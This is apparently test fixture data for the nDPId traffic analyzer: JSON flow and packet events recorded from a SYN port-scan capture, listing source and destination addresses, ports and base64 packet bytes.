-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1193,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1184,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAs1pwAADMGPtasEAAIQA2GNIzSAEbdUoMYAAAAAGACEAAoSQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1194,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1194,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1185,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsCvQAAC8GDn+sEAAIQA2GNIzSB9PdUoMYAAAAAGACEAAgvAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1195,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1186,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsEhYAADIGBF2sEAAIQA2GNIzSBAbdUoMYAAAAAGACDAAoiQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1196,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1196,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1187,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsysMAADYGR6+sEAAIQA2GNIzSAh\/dUoMYAAAAAGACDAAqcAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1197,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1188,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAshYsAADUGjeesEAAIQA2GNIzSBGzdUoMYAAAAAGACCAAsIwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1198,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060291,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64623,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1198,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1189,"flow_packet_id":1,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060291,"pkt":"ACYLMQczACWzv5HuCABFAAAsx5MAACYGWt+sEAAIQA2GNIzS\/G\/dUoMYAAAAAGACDAAwHwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1199,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1199,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1190,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsd4EAAC8GofGsEAAIQA2GNIzSF3fdUoMYAAAAAGACEAARGAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1200,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1191,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsV8MAADAGwK+sEAAIQA2GNIzSDOTdUoMYAAAAAGACBAAnqwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1201,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1192,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsDVUAACcGFB6sEAAIQA2GNIzSAN7dUoMYAAAAAGACEAAnsQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1202,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1193,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsTlwAADEGyRasEAAIQA2GNIzSIALdUoMYAAAAAGACCAAQjQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1203,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10628,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1194,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsKmwAACoG9AasEAAIQA2GNIzSKYTdUoMYAAAAAGACDAADCwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1204,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1204,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1195,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAscZcAACYGsNusEAAIQA2GNIzSEVzdUoMYAAAAAGACDAAbMwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1205,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":79,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1205,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1196,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAslUQAADkGei6sEAAIQA2GNIzSAE\/dUoMYAAAAAGACCAAwQAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1206,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1206,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1197,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAsfT0AADYGlTWsEAAIQA2GNIzSHwLdUoMYAAAAAGACDAANjQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1207,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060292,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1207,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1198,"flow_packet_id":1,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060292,"pkt":"ACYLMQczACWzv5HuCABFAAAseaIAAC4GoNCsEAAIQA2GNIzSBAjdUoMYAAAAAGACDAAohwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1208,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1199,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsHtMAACcGAqCsEAAIQA2GNIzTCEfdU4MZAAAAAGACEAAgRQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1209,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1209,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1200,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsp1MAACsGdh+sEAAIQA2GNIzTH5XdU4MZAAAAAGACEAAI9wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1210,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1201,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsELoAACkGDrmsEAAIQA2GNIzTFTjdU4MZAAAAAGACCAAbVAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1211,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4446,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1211,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1202,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsMaIAACcG79CsEAAIQA2GNIzTEV7dU4MZAAAAAGACEAAXLgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1212,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1212,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1203,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAszmMAADAGSg+sEAAIQA2GNIzTBFLdU4MZAAAAAGACBAAwOgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1213,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1213,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1204,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsr3kAADcGYfmsEAAIQA2GNIzTCGDdU4MZAAAAAGACEAAgLAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1214,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5960,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1214,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1205,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsoj0AACUGgTWsEAAIQA2GNIzTF0jdU4MZAAAAAGACCAAZRAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1215,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1215,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1206,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsj+cAACkGj4usEAAIQA2GNIzTBHLdU4MZAAAAAGACCAAsGgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1216,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1216,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1207,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsL4YAADsG3eysEAAIQA2GNIzTB\/rdU4MZAAAAAGACEAAgkgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1217,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060335,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1217,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1208,"flow_packet_id":1,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060335,"pkt":"ACYLMQczACWzv5HuCABFAAAsgXEAACcGoAGsEAAIQA2GNIzTABPdU4MZAAAAAGACEAAoeQAAAgQFtA=="} 